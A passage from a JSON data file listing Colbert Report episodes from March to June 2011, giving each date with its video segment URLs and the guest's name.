        "http://thecolbertreport.cc.com/videos/2x8ter/sign-off---late-night-snack"
      ],
      "guest": "Mark W. Moffett"
    },
    {
      "date": "2011-03-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/432mwn/intro---3-7-11",
        "http://thecolbertreport.cc.com/videos/dmu7rh/stephen-wants-an-ipad-2",
        "http://thecolbertreport.cc.com/videos/zql2lp/on-notice---mike-huckabee",
        "http://thecolbertreport.cc.com/videos/mrhaui/america-s-next-gop-model",
        "http://thecolbertreport.cc.com/videos/ux0w7b/joshua-foer",
        "http://thecolbertreport.cc.com/videos/un3kdu/art-stephen-up-challenge---bid-on-stephen-s-portrait"
      ],
      "guest": "Joshua Foer"
    },
    {
      "date": "2011-03-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2s9pic/happy-mardi-gras---international-women-s-day",
        "http://thecolbertreport.cc.com/videos/29cv4a/light-bulb-ban",
        "http://thecolbertreport.cc.com/videos/yuo5to/light-bulb-ban---dale-bryk",
        "http://thecolbertreport.cc.com/videos/2nv2ie/charlie-sheen---fake-rahm-emanuel-on-twitter",
        "http://thecolbertreport.cc.com/videos/dqh7vp/dan-sinker",
        "http://thecolbertreport.cc.com/videos/wjd0wx/sign-off---welcome-zoe-simone-sanchez"
      ],
      "guest": "Dan Sinker"
    },
    {
      "date": "2011-03-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/oivxm4/intro---3-9-11",
        "http://thecolbertreport.cc.com/videos/durtx6/stephen-gives-up-catholicism-for-lent",
        "http://thecolbertreport.cc.com/videos/c3zm6w/bench-press",
        "http://thecolbertreport.cc.com/videos/qi1r7y/bench-press---anthony-weiner",
        "http://thecolbertreport.cc.com/videos/mbmsxi/david-brooks",
        "http://thecolbertreport.cc.com/videos/bh348l/sign-off---jewish-stephen"
      ],
      "guest": "David Brooks"
    },
    {
      "date": "2011-03-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/au4itm/intro---3-10-11",
        "http://thecolbertreport.cc.com/videos/w8nzdj/newt-gingrich-wants-to-screw-america",
        "http://thecolbertreport.cc.com/videos/hagj8b/colbert-pac-ad",
        "http://thecolbertreport.cc.com/videos/k698u1/peter-king-understands-violent-radicalism",
        "http://thecolbertreport.cc.com/videos/84jg83/reza-aslan",
        "http://thecolbertreport.cc.com/videos/x9iaae/sign-off---enjoy-the-moment"
      ],
      "guest": "Reza Aslan"
    },
    {
      "date": "2011-03-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/tkzzdn/intro---3-21-11",
        "http://thecolbertreport.cc.com/videos/btot11/crisis-in-the-middle-everywhere---japan---libya",
        "http://thecolbertreport.cc.com/videos/kvj8rv/raging-art-on---art-1",
        "http://thecolbertreport.cc.com/videos/9m4lpg/sign-off---dueling-banjos"
      ],
      "guest": "Steve Martin and the Steep Canyon Rangers"
    },
    {
      "date": "2011-03-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/67fxmc/intro---3-22-11",
        "http://thecolbertreport.cc.com/videos/4k1vs5/californians-respond-to-japanese-disaster",
        "http://thecolbertreport.cc.com/videos/tadiop/raging-art-on---art-2",
        "http://thecolbertreport.cc.com/videos/7fv2d8/crisis-in-the-middle-everywhere---cnn-and-fox-news-fight-in-libya",
        "http://thecolbertreport.cc.com/videos/iky4d9/ayman-mohyeldin",
        "http://thecolbertreport.cc.com/videos/f8fwxt/sign-off---goodnight"
      ],
      "guest": "Ayman Mohyeldin"
    },
    {
      "date": "2011-03-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/m2qxvd/top-news-stories-all-at-once",
        "http://thecolbertreport.cc.com/videos/3rhe0w/raging-art-on---art-3",
        "http://thecolbertreport.cc.com/videos/3ccbj2/the-word---over-reactor",
        "http://thecolbertreport.cc.com/videos/wd1pjd/nathan-myhrvold",
        "http://thecolbertreport.cc.com/videos/l5f2yi/sign-off---pistachio-ice-cream"
      ],
      "guest": "Nathan Myhrvold"
    },
    {
      "date": "2011-03-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/awwa6r/intro---3-24-11",
        "http://thecolbertreport.cc.com/videos/o0idw2/bears---balls---misery-edition",
        "http://thecolbertreport.cc.com/videos/pst3ox/eat--pray-to-eat---laurie-garrett",
        "http://thecolbertreport.cc.com/videos/strtop/channeled-rage",
        "http://thecolbertreport.cc.com/videos/rfce7l/jody-williams",
        "http://thecolbertreport.cc.com/videos/3z7nhm/sign-off---john-oliver-s-new-york-stand-up-show"
      ],
      "guest": "Jody Williams"
    },
    {
      "date": "2011-03-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2u3wdk/intro---3-28-11",
        "http://thecolbertreport.cc.com/videos/vou6it/shout-out-to-cece-lederer",
        "http://thecolbertreport.cc.com/videos/xeu06g/chaos-in-chaonada",
        "http://thecolbertreport.cc.com/videos/s3xgtv/tip-wag---cigarette-tax--abortion-waiting-period---bargain-travelers",
        "http://thecolbertreport.cc.com/videos/c06ht5/maine-squeeze",
        "http://thecolbertreport.cc.com/videos/2p412b/michael-moore",
        "http://thecolbertreport.cc.com/videos/lplrhl/sign-off---movits--streams--out-of-my-head-"
      ],
      "guest": "Michael Moore"
    },
    {
      "date": "2011-03-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xysvku/intro---3-29-11",
        "http://thecolbertreport.cc.com/videos/wtajtw/turd-sandwich-in-libya",
        "http://thecolbertreport.cc.com/videos/fkwv1e/yahweh-or-no-way---christianity-is-fattening",
        "http://thecolbertreport.cc.com/videos/oa9b4m/stephen-s-next-religion---stephen-prothero",
        "http://thecolbertreport.cc.com/videos/730dpm/jimmy-fallon-promises-a-performance-by-stephen",
        "http://thecolbertreport.cc.com/videos/7m3guo/anthony-fauci",
        "http://thecolbertreport.cc.com/videos/ms1yr8/sign-off---do-not-help-jimmy-fallon"
      ],
      "guest": "Dr. Anthony Fauci"
    },
    {
      "date": "2011-03-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6nwkpk/exclusive---reporter-gets-nailed-by-san-francisco-cop",
        "http://thecolbertreport.cc.com/videos/xysvku/intro---3-29-11",
        "http://thecolbertreport.cc.com/videos/wtajtw/turd-sandwich-in-libya",
        "http://thecolbertreport.cc.com/videos/fkwv1e/yahweh-or-no-way---christianity-is-fattening",
        "http://thecolbertreport.cc.com/videos/oa9b4m/stephen-s-next-religion---stephen-prothero",
        "http://thecolbertreport.cc.com/videos/730dpm/jimmy-fallon-promises-a-performance-by-stephen",
        "http://thecolbertreport.cc.com/videos/7m3guo/anthony-fauci",
        "http://thecolbertreport.cc.com/videos/ms1yr8/sign-off---do-not-help-jimmy-fallon"
      ],
      "guest": "Tim Shriver"
    },
    {
      "date": "2011-03-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zxtidm/james-o-keefe-asks-for-donations",
        "http://thecolbertreport.cc.com/videos/8stgre/colbert-pac",
        "http://thecolbertreport.cc.com/videos/dtl1ew/colbert-pac---trevor-potter",
        "http://thecolbertreport.cc.com/videos/i3lpcq/stephen-practices-rebecca-black-s--friday-",
        "http://thecolbertreport.cc.com/videos/wug1p5/tim-shriver",
        "http://thecolbertreport.cc.com/videos/dwx5m0/sign-off---goodnight"
      ],
      "guest": "Tim Shriver"
    },
    {
      "date": "2011-03-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/a6ko78/intro---3-31-11",
        "http://thecolbertreport.cc.com/videos/oth30j/congressional-budget-menorah",
        "http://thecolbertreport.cc.com/videos/j56fvd/madison-as-hell",
        "http://thecolbertreport.cc.com/videos/o6su04/piers-gibbon",
        "http://thecolbertreport.cc.com/videos/gq7wfn/sign-off---congressional-budget-menorah-fire"
      ],
      "guest": "Piers Gibbon"
    },
    {
      "date": "2011-04-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nknyci/government-shutdown-menorah",
        "http://thecolbertreport.cc.com/videos/8fsxhp/stephen-shows-off-the-ipad-2",
        "http://thecolbertreport.cc.com/videos/953smc/the-word---that-new-smell-smell",
        "http://thecolbertreport.cc.com/videos/zr09m5/the-glennpocalypse",
        "http://thecolbertreport.cc.com/videos/j7j5ds/andrew-chaikin",
        "http://thecolbertreport.cc.com/videos/9h7n61/sign-off---inescapables"
      ],
      "guest": "Andrew Chaikin"
    },
    {
      "date": "2011-04-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/x139me/tim-pawlenty-appeals-to-youth-vote",
        "http://thecolbertreport.cc.com/videos/dq1pyh/renaissance-nemesis---frank-jameso",
        "http://thecolbertreport.cc.com/videos/zw8gjf/james-franco-pt--1",
        "http://thecolbertreport.cc.com/videos/91jml7/james-franco-pt--2",
        "http://thecolbertreport.cc.com/videos/upimil/sign-off---frank-jameso"
      ],
      "guest": "James Franco"
    },
    {
      "date": "2011-04-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1fi1u8/wisconsin-supreme-court-race",
        "http://thecolbertreport.cc.com/videos/vu85n8/my-fair-colbert---hugo-vickers-pt--1",
        "http://thecolbertreport.cc.com/videos/53yz6p/wd-40-1",
        "http://thecolbertreport.cc.com/videos/q5s3lh/sir-david-tang",
        "http://thecolbertreport.cc.com/videos/oqhpiw/sign-off---wd-40-1-cleaner"
      ],
      "guest": "Sir David Tang"
    },
    {
      "date": "2011-04-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/x9mvny/exclusive---my-fair-colbert---charming-prince-philip",
        "http://thecolbertreport.cc.com/videos/ruv6gp/exclusive---my-fair-colbert---ghost-of-an-irishman",
        "http://thecolbertreport.cc.com/videos/k0xu9f/intro---4-7-11",
        "http://thecolbertreport.cc.com/videos/a3oo5c/the-koran-s-best-day-ever",
        "http://thecolbertreport.cc.com/videos/uepxed/my-fair-colbert---hugo-vickers-pt--2",
        "http://thecolbertreport.cc.com/videos/4zz0jd/my-fair-colbert---hugo-vickers-pt--3",
        "http://thecolbertreport.cc.com/videos/hv2afg/jeff-greenfield",
        "http://thecolbertreport.cc.com/videos/b9aslx/sign-off---goodnight"
      ],
      "guest": "Jeff Greenfield"
    },
    {
      "date": "2011-04-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5p5wwd/countdown-to-government-shutdown",
        "http://thecolbertreport.cc.com/videos/wueypc/pap-smears-at-walgreens",
        "http://thecolbertreport.cc.com/videos/5o6455/thought-for-food---chocolate-air--denny-s---bacon-cologne",
        "http://thecolbertreport.cc.com/videos/5ej465/jamie-hyneman---adam-savage",
        "http://thecolbertreport.cc.com/videos/sse1uc/sign-off---champagne-flute-of-lead-paint"
      ],
      "guest": "Jamie Hyneman &amp; Adam Savage"
    },
    {
      "date": "2011-04-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hvb9sp/intro---4-12-11",
        "http://thecolbertreport.cc.com/videos/ez4az7/jon-kyl-tweets-not-intended-to-be-factual-statements",
        "http://thecolbertreport.cc.com/videos/xcin15/mitt-happens",
        "http://thecolbertreport.cc.com/videos/l039ce/mitt-happens---rick-brookhiser",
        "http://thecolbertreport.cc.com/videos/pqpkrr/threat-level--rainbow",
        "http://thecolbertreport.cc.com/videos/2gpjkk/ray-kurzweil",
        "http://thecolbertreport.cc.com/videos/ry2cgl/sign-off---goodnight"
      ],
      "guest": "Ray Kurzweil"
    },
    {
      "date": "2011-04-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/tjsqfs/tim-pawlenty-declares-candidacy-before-he-s-ready",
        "http://thecolbertreport.cc.com/videos/ha4gop/the-word---buy-and-cellulite",
        "http://thecolbertreport.cc.com/videos/jc9fbz/the-enemy-within---unicyclists",
        "http://thecolbertreport.cc.com/videos/nm38xu/morgan-spurlock",
        "http://thecolbertreport.cc.com/videos/l1ikyh/sign-off---doritos-suit"
      ],
      "guest": "Morgan Spurlock"
    },
    {
      "date": "2011-04-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fziyvf/obama-needs-charts-and-graphs",
        "http://thecolbertreport.cc.com/videos/pfzzi1/viacom-ruins-stephen-s-pac-dream",
        "http://thecolbertreport.cc.com/videos/yzb7q2/colbert-super-pac---trevor-potter",
        "http://thecolbertreport.cc.com/videos/k099cq/easter-under-attack---egg-edition",
        "http://thecolbertreport.cc.com/videos/iybrlk/caroline-kennedy",
        "http://thecolbertreport.cc.com/videos/rjwyn0/sign-off---ipad"
      ],
      "guest": "Caroline Kennedy"
    },
    {
      "date": "2011-04-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/00rg0h/catholic-bender",
        "http://thecolbertreport.cc.com/videos/tml3zz/obama-s-tax-return---road-to-the-trump-house",
        "http://thecolbertreport.cc.com/videos/e943tp/cheating-death---vaxa-international--lap-band-surgery---restless-leg-syndrome",
        "http://thecolbertreport.cc.com/videos/nxhrou/ron-paul",
        "http://thecolbertreport.cc.com/videos/8813vl/sign-off---vacsa-not-masturbating"
      ],
      "guest": "Rep. Ron Paul"
    },
    {
      "date": "2011-04-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hl20qf/intro---4-26-11",
        "http://thecolbertreport.cc.com/videos/zv4zje/mitt-romney-s--peacetime--gaffe",
        "http://thecolbertreport.cc.com/videos/rmltni/charles-manson-believes-in-global-warming",
        "http://thecolbertreport.cc.com/videos/i3gdyb/a-c--grayling",
        "http://thecolbertreport.cc.com/videos/qxdqyc/sign-off---taser"
      ],
      "guest": "A.C. Grayling"
    },
    {
      "date": "2011-04-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/d9mieg/intro---4-27-11",
        "http://thecolbertreport.cc.com/videos/cnt2qq/america-needs-to-see-obama-s-report-cards",
        "http://thecolbertreport.cc.com/videos/vog079/tip-wag---faa--casio-watches---postal-service",
        "http://thecolbertreport.cc.com/videos/qu6i2l/anderson-cooper-goes-on-the-absurd-u-chart",
        "http://thecolbertreport.cc.com/videos/okt7ac/ice-t",
        "http://thecolbertreport.cc.com/videos/bi5bau/sign-off---goodnight-in-spanish"
      ],
      "guest": "Ice-T"
    },
    {
      "date": "2011-04-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xcnvxf/intro---4-28-11",
        "http://thecolbertreport.cc.com/videos/6ei496/stephen-waits-for-his-royal-wedding-invitation-in-london",
        "http://thecolbertreport.cc.com/videos/8ureil/progressives-united---russ-feingold",
        "http://thecolbertreport.cc.com/videos/dfmioz/homeland-security-eliminates-color-coded-terror-alert-system",
        "http://thecolbertreport.cc.com/videos/r7zj9a/wade-graham",
        "http://thecolbertreport.cc.com/videos/tsom8o/sign-off---off-to-the-royal-wedding"
      ],
      "guest": "Wade Graham"
    },
    {
      "date": "2011-05-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/792my5/intro---5-2-11",
        "http://thecolbertreport.cc.com/videos/6kw3l1/long-awaited--we-got-bin-laden--party",
        "http://thecolbertreport.cc.com/videos/501cxj/carefree-pre-9-11-world",
        "http://thecolbertreport.cc.com/videos/w147rj/relations-with-pakistan---richard-haass",
        "http://thecolbertreport.cc.com/videos/x03tm5/francis-fukuyama",
        "http://thecolbertreport.cc.com/videos/s3o1z2/sign-off---obama-s-timer-runs-out"
      ],
      "guest": "Francis Fukuyama"
    },
    {
      "date": "2011-05-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/v58m27/intro---5-3-11",
        "http://thecolbertreport.cc.com/videos/h9f07a/osama-bin-laden-is-still-dead",
        "http://thecolbertreport.cc.com/videos/5n9zp7/obama-takes-credit-for-bin-laden-s-assassination",
        "http://thecolbertreport.cc.com/videos/h1wdo9/journalistic-grintegrity",
        "http://thecolbertreport.cc.com/videos/u2r1n6/rex-ryan",
        "http://thecolbertreport.cc.com/videos/ukrfvl/sign-off---special-kiss"
      ],
      "guest": "Rex Ryan"
    },
    {
      "date": "2011-05-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/edkk4q/intro---5-4-11",
        "http://thecolbertreport.cc.com/videos/ndiuxr/terrorists--they-re-just-like-us-",
        "http://thecolbertreport.cc.com/videos/kbkvj6/stephen-searches-for-shared-bathroom-key",
        "http://thecolbertreport.cc.com/videos/kt1w5q/movies-that-are-destroying-america---saving-america-edition",
        "http://thecolbertreport.cc.com/videos/50b5cb/amy-farrell",
        "http://thecolbertreport.cc.com/videos/jcmie8/sign-off---goodnight"
      ],
      "guest": "Amy Farrell"
    },
    {
      "date": "2011-05-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lbrn85/stephen-confesses-to-a-distracted-media",
        "http://thecolbertreport.cc.com/videos/avpz0y/threatdown---superman--madden-nfl-12----glee-",
        "http://thecolbertreport.cc.com/videos/g2bhyr/inaugural-republican-presidential-debate---donald-trump-s-wisdom",
        "http://thecolbertreport.cc.com/videos/4neb1g/bill-james",
        "http://thecolbertreport.cc.com/videos/k2or8w/sign-off---dennis-kucinich-heat-vision"
      ],
      "guest": "Bill James"
    },
    {
      "date": "2011-05-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/dkbe7y/intro---5-9-11",
        "http://thecolbertreport.cc.com/videos/6rdbxz/hasidic-newspaper-removes-hillary-clinton",
        "http://thecolbertreport.cc.com/videos/mqyr6k/herman-cain-wins-the-first-republican-presidential-debate",
        "http://thecolbertreport.cc.com/videos/38grqn/the-word---autocratic-for-the-people",
        "http://thecolbertreport.cc.com/videos/d8bi6b/lupe-fiasco",
        "http://thecolbertreport.cc.com/videos/vonv0r/sign-off---lupe-fiasco-s--lasers-"
      ],
      "guest": "Lupe Fiasco"
    },
    {
      "date": "2011-05-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/r02fac/newt-gingrich---donald-trump-announce-future-announcements",
        "http://thecolbertreport.cc.com/videos/w3lgcs/yahweh-or-no-way---thor---apocalypse-billboard",
        "http://thecolbertreport.cc.com/videos/zu0ju2/difference-makers---donald-trump",
        "http://thecolbertreport.cc.com/videos/i4gyok/geoffrey-rush",
        "http://thecolbertreport.cc.com/videos/wmfolw/sign-off---a-rare-correction"
      ],
      "guest": "Geoffrey Rush"
    },
    {
      "date": "2011-05-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/g0js2x/intro---5-11-11",
        "http://thecolbertreport.cc.com/videos/txo75b/herman-cain-claims-the-colbert-bump",
        "http://thecolbertreport.cc.com/videos/1ssaiz/corp-constituency",
        "http://thecolbertreport.cc.com/videos/nfv0i1/corp-constituency---trevor-potter",
        "http://thecolbertreport.cc.com/videos/rqvi06/award-to-the-wise",
        "http://thecolbertreport.cc.com/videos/sjt27k/eric-greitens",
        "http://thecolbertreport.cc.com/videos/q3siyv/sign-off---press-hat"
      ],
      "guest": "Eric Greitens"
    },
    {
      "date": "2011-05-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mp7mrs/intro---5-12-11",
        "http://thecolbertreport.cc.com/videos/zz94qv/obama-s-latino-panderfest",
        "http://thecolbertreport.cc.com/videos/vkp4tr/terror--a-new-one",
        "http://thecolbertreport.cc.com/videos/9o0mt6/terror--a-new-one---lawrence-wright",
        "http://thecolbertreport.cc.com/videos/dqvz13/if-at-first-you-don-t-secede",
        "http://thecolbertreport.cc.com/videos/yx5grt/john-bradshaw",
        "http://thecolbertreport.cc.com/videos/sw8fy6/sign-off---stephen-s-super-pac-needs-support"
      ],
      "guest": "John Bradshaw"
    },
    {
      "date": "2011-05-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9xaxr4/mike-huckabee---donald-trump-drop-out",
        "http://thecolbertreport.cc.com/videos/duon08/fig-newton-gingrich-2012",
        "http://thecolbertreport.cc.com/videos/epwg6t/stephen-files-super-pac-request",
        "http://thecolbertreport.cc.com/videos/g3ep11/alison-klayman",
        "http://thecolbertreport.cc.com/videos/4r7evh/sign-off---goodnight"
      ],
      "guest": "Alison Klayman"
    },
    {
      "date": "2011-05-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ip5tv7/intro---5-17-11",
        "http://thecolbertreport.cc.com/videos/1ugsri/world-s-oldest-panda-dies",
        "http://thecolbertreport.cc.com/videos/l4p5dq/the-word---enhanced-rejustification",
        "http://thecolbertreport.cc.com/videos/pg06l0/arnold-schwarzenegger-s-sex-scandal",
        "http://thecolbertreport.cc.com/videos/58filp/amy-kremer",
        "http://thecolbertreport.cc.com/videos/no1rv9/sign-off---goodnight"
      ],
      "guest": "Amy Kremer"
    },
    {
      "date": "2011-05-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/faf2no/exclusive---austan-goolsbee-extended-interview-pt--1",
        "http://thecolbertreport.cc.com/videos/6pf58s/exclusive---austan-goolsbee-extended-interview-pt--2",
        "http://thecolbertreport.cc.com/videos/bdi4g4/exclusive---austan-goolsbee-extended-interview-pt--3",
        "http://thecolbertreport.cc.com/videos/6khcvr/intro---5-18-11",
        "http://thecolbertreport.cc.com/videos/55ye8a/osama-bin-laden-s-replacement",
        "http://thecolbertreport.cc.com/videos/tohq6g/tip-wag---ohio-legislature---facebook",
        "http://thecolbertreport.cc.com/videos/2cxcrh/breaking-newt",
        "http://thecolbertreport.cc.com/videos/vvu071/austan-goolsbee",
        "http://thecolbertreport.cc.com/videos/sklv51/sign-off---long-austan-goolsbee-interview"
      ],
      "guest": "Austan Goolsbee"
    },
    {
      "date": "2011-05-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7qmvog/john-lithgow-performs-gingrich-press-release",
        "http://thecolbertreport.cc.com/videos/pb82sf/better-know-a-district---illinois--18th---aaron-schock-update",
        "http://thecolbertreport.cc.com/videos/3gd1zf/clergy-matic-ecclesi-action-center-3-16",
        "http://thecolbertreport.cc.com/videos/5ec3r8/kareem-abdul-jabbar",
        "http://thecolbertreport.cc.com/videos/p12tcc/sign-off---history-of-life-on-earth"
      ],
      "guest": "Kareem Abdul-Jabbar"
    },
    {
      "date": "2011-05-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/gn9ut5/intro---5-31-11",
        "http://thecolbertreport.cc.com/videos/xxn340/charleston-to-bermuda-yacht-race",
        "http://thecolbertreport.cc.com/videos/fgthom/sarah-palin-s-bus-tour",
        "http://thecolbertreport.cc.com/videos/bmwaxh/fec-questions---trevor-potter",
        "http://thecolbertreport.cc.com/videos/7bl2ga/invisible-judgment",
        "http://thecolbertreport.cc.com/videos/ox3on4/james-stewart",
        "http://thecolbertreport.cc.com/videos/vn091b/sign-off---goodnight"
      ],
      "guest": "James B. Stewart"
    },
    {
      "date": "2011-06-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nos79v/intro---6-1-11",
        "http://thecolbertreport.cc.com/videos/mqb30h/sarah-palin-visits-the-times-square-applebee-s",
        "http://thecolbertreport.cc.com/videos/ul70kx/meat-tweet",
        "http://thecolbertreport.cc.com/videos/jph6sv/harmful-cell-phones",
        "http://thecolbertreport.cc.com/videos/beqc1p/who-s-riding-my-coattails-now----jimmy-fallon",
        "http://thecolbertreport.cc.com/videos/5a4ke7/robert-f--kennedy-jr-",
        "http://thecolbertreport.cc.com/videos/3enqpr/sign-off---iphone"
      ],
      "guest": "Robert Kennedy Jr."
    },
    {
      "date": "2011-06-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7o4l3r/intro---6-2-11",
        "http://thecolbertreport.cc.com/videos/rqi6dy/dancing-on-the-ceiling",
        "http://thecolbertreport.cc.com/videos/1db84y/anthony-weiner-addresses-twitter-scandal",
        "http://thecolbertreport.cc.com/videos/qhexu1/tip-wag---osama-bin-laden---hugh-hefner",
        "http://thecolbertreport.cc.com/videos/8t7m7k/salman-khan",
        "http://thecolbertreport.cc.com/videos/rqa2ar/sign-off---goodnight"
      ],
      "guest": "Salman Khan"
    },
    {
      "date": "2011-06-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/bwqzbu/anthony-weiner-s-emergency-press-conference",
        "http://thecolbertreport.cc.com/videos/uvi91o/paul-revere-s-famous-ride",
        "http://thecolbertreport.cc.com/videos/x424g2/stephen-s-twitter-scandal",
        "http://thecolbertreport.cc.com/videos/qyadrw/obama-administration-replaces-food-pyramid",
        "http://thecolbertreport.cc.com/videos/fdolcv/werner-herzog",
        "http://thecolbertreport.cc.com/videos/ed6qec/stephen-s-midnight-ride"
      ],
      "guest": "Werner Herzog"
    },
    {
      "date": "2011-06-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/suzxde/scott-pelley-s-first-cbs-broadcast",
        "http://thecolbertreport.cc.com/videos/1w9fvc/the-word---hear-no-evil",
        "http://thecolbertreport.cc.com/videos/fvvawg/sugar-ray-leonard",
        "http://thecolbertreport.cc.com/videos/b4ot0e/apologies-to-shimshamistan"
      ],
      "guest": "Sugar Ray Leonard"
    },
    {
      "date": "2011-06-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fq1085/herman-cain-wants-small-bills",
        "http://thecolbertreport.cc.com/videos/bmggoz/better-know-a-district---california-s-10th---john-garamendi",
        "http://thecolbertreport.cc.com/videos/ycdgvg/weiner-captures-manscaping-vote",
        "http://thecolbertreport.cc.com/videos/yvz8wj/bre-pettis",
        "http://thecolbertreport.cc.com/videos/ao2r17/sign-off---makerbot-head"
      ],
      "guest": "Bre Pettis"
    },
    {
      "date": "2011-06-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/tz9edm/shaquille-o-neal-retires",
        "http://thecolbertreport.cc.com/videos/umrvml/mitt-romney-leads-in-fox-news-poll",
        "http://thecolbertreport.cc.com/videos/qgxogp/the-word---the-business-end",
        "http://thecolbertreport.cc.com/videos/oneftb/andrew-breitbart-reveals-weiner-photo",
        "http://thecolbertreport.cc.com/videos/5f3kap/tom-ridge",
        "http://thecolbertreport.cc.com/videos/vvj5q2/sign-off---goodnight"
      ],
      "guest": "Tom Ridge"
    },
    {
      "date": "2011-06-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/0zzkov/anthony-weiner-gym-photos",
        "http://thecolbertreport.cc.com/videos/vgcql3/sport-report---miami-heat--fifa---freestyle-canoe-dancing",
        "http://thecolbertreport.cc.com/videos/vyyl7z/henry-kissinger-pt--1",
        "http://thecolbertreport.cc.com/videos/2j87li/henry-kissinger-pt--2",
        "http://thecolbertreport.cc.com/videos/w5b5l1/sign-off---goodnight"
      ],
      "guest": "Henry Kissinger"
    },
    {
      "date": "2011-06-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lokk6e/intro---6-14-11",
        "http://thecolbertreport.cc.com/videos/egh1n7/elephants-in-the-room",
        "http://thecolbertreport.cc.com/videos/ykt712/close-sesame",
        "http://thecolbertreport.cc.com/videos/s6kp16/janny-scott",
        "http://thecolbertreport.cc.com/videos/j0gylk/sign-off---marshmallows"
      ],
      "guest": "Janny Scott"
    },
    {
      "date": "2011-06-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/d8iaxd/intro---6-15-11",
        "http://thecolbertreport.cc.com/videos/zj00ia/iran-bans-necklaces-and-shorts",
        "http://thecolbertreport.cc.com/videos/xbt4w9/kindergarten-gop",
        "http://thecolbertreport.cc.com/videos/ynp682/the-word---shock-the-vote",
        "http://thecolbertreport.cc.com/videos/46tlsv/senior-moment---pot-smoking-seniors",
        "http://thecolbertreport.cc.com/videos/5h6ee5/keith-olbermann",
        "http://thecolbertreport.cc.com/videos/5rh3rg/sign-off---stephen-wears-shorts"
      ],
      "guest": "Keith Olbermann"
    },
    {
      "date": "2011-06-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2374v3/intro---6-20-11",
        "http://thecolbertreport.cc.com/videos/q7b70y/stephest-colbchella--011---rock-you-like-a-thirst-icane",
        "http://thecolbertreport.cc.com/videos/y7lr8u/threatdown---moo-shu-man-milk--centenarians---robo-slackers",
        "http://thecolbertreport.cc.com/videos/gds7n9/justin-vernon",
        "http://thecolbertreport.cc.com/videos/su735n/sign-off---bon-iver-bonus-song"
      ],
      "guest": "Bon Iver"
    },
    {
      "date": "2011-06-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3o3le7/generic-republican-presidential-nominee",
        "http://thecolbertreport.cc.com/videos/ct0au7/stephest-colbchella--011---stephen-revives-his-music-career",
        "http://thecolbertreport.cc.com/videos/v43nph/2011--a-rock-odyssey-featuring-jack-white-pt--1",
        "http://thecolbertreport.cc.com/videos/7e8ifi/florence-welch",
        "http://thecolbertreport.cc.com/videos/ei7r0b/sign-off---talib-kweli-tomorrow"
      ],
      "guest": "Florence and the Machine"
    },
    {
      "date": "2011-06-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/f5h9ob/george-w--bush-helps-break-a-world-record",
        "http://thecolbertreport.cc.com/videos/ozlnky/2011--a-rock-odyssey-featuring-jack-white-pt--2",
        "http://thecolbertreport.cc.com/videos/u3bmmq/the-word---the-defining-moment",
        "http://thecolbertreport.cc.com/videos/c7shlp/talib-kweli"
      ],
      "guest": "Talib Kweli"
    },
    {
      "date": "2011-06-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ihqt34/exclusive---2011--a-rock-odyssey-featuring-jack-white---catholic-throwdown",
        "http://thecolbertreport.cc.com/videos/zbc2ok/stephest-colbchella--011---stephen-announces-his-hit-song",
        "http://thecolbertreport.cc.com/videos/1if3ir/nation-building-in-america",
        "http://thecolbertreport.cc.com/videos/4evhq9/2011--a-rock-odyssey-featuring-jack-white-pt--3",
        "http://thecolbertreport.cc.com/videos/39or3g/jack-white"
      ],
      "guest": "The Black Belles"
    },
    {
      "date": "2011-06-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8tiso3/intro---6-27-11",
        "http://thecolbertreport.cc.com/videos/zz1v27/tip-wag---scented-razors---rick-scott-s-approval-rating",
        "http://thecolbertreport.cc.com/videos/7e3kfb/stephen---jonathan-alter-at-gaillard-auditorium",
        "http://thecolbertreport.cc.com/videos/npgonl/good-point-other-point---ted-nugent-vs--millennials",
        "http://thecolbertreport.cc.com/videos/89vjk7/grover-norquist",
